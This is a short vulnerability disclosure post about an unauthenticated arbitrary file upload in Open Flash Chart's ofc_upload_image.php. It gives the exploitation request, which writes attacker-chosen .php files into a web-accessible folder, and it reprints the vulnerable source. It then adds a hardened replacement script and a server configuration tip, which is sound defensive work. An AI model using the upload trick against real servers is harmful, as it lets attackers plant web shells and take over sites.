POST data vulnerability: the vulnerable file saves files with an arbitrary extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)

POST arbitrary data

Saved to: http://localhost/chart/tmp-upload-images/hfy.php

This is the vulnerable file from the latest version of wss; even the paid version has it. From the demo deployed in the Sina store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is simply a tragedy. How to deal with it: add an authorization check, validation of the extension and so on~ Do it yourself.
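
The fix the post asks for (an authorization check plus extension and content validation), as an added example; it is not code from the original post or from the Open Flash Chart project. The session key `user_id`, the 2 MiB cap and the PNG-only policy are assumptions, and it needs PHP 7.1+ with the GD extension.

```php
<?php
// Added example: hardened replacement for ofc_upload_image.php.
// Assumptions (not from the original post): the application sets
// $_SESSION['user_id'] at login; 2 MiB size cap; PNG-only output.
session_start();

const MAX_BYTES = 2097152; // 2 MiB, assumed limit

function reject(int $code, string $msg): void {
    http_response_code($code);
    exit($msg);
}

// 1. Authorization: only logged-in users may save chart images.
if (empty($_SESSION['user_id'])) {
    reject(403, 'Forbidden');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    reject(405, 'Method not allowed');
}

// 2. Read the raw body with a size cap ($HTTP_RAW_POST_DATA is gone in PHP 7).
$body = file_get_contents('php://input', false, null, 0, MAX_BYTES + 1);
if ($body === false || $body === '' || strlen($body) > MAX_BYTES) {
    reject(413, 'Empty or oversized body');
}

// 3. Content check: the bytes must really be a PNG, not just be named like one.
$info = @getimagesizefromstring($body);
if ($info === false || $info[2] !== IMAGETYPE_PNG) {
    reject(415, 'Only PNG images are accepted');
}

// 4. Re-encode through GD so anything appended to the image data is dropped.
$img = @imagecreatefromstring($body);
if ($img === false) {
    reject(415, 'Invalid image');
}

// 5. Server-chosen name with a fixed extension; ?name= is ignored entirely.
$dir = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($dir)) mkdir($dir, 0750, true);
$file = bin2hex(random_bytes(16)) . '.png';
if (!imagepng($img, $dir . $file)) {
    reject(500, 'Could not save image');
}
echo 'Saved as: ' . $file;
```

Independently of the script, configure the web server so that nothing under tmp-upload-images/ is handed to the PHP interpreter.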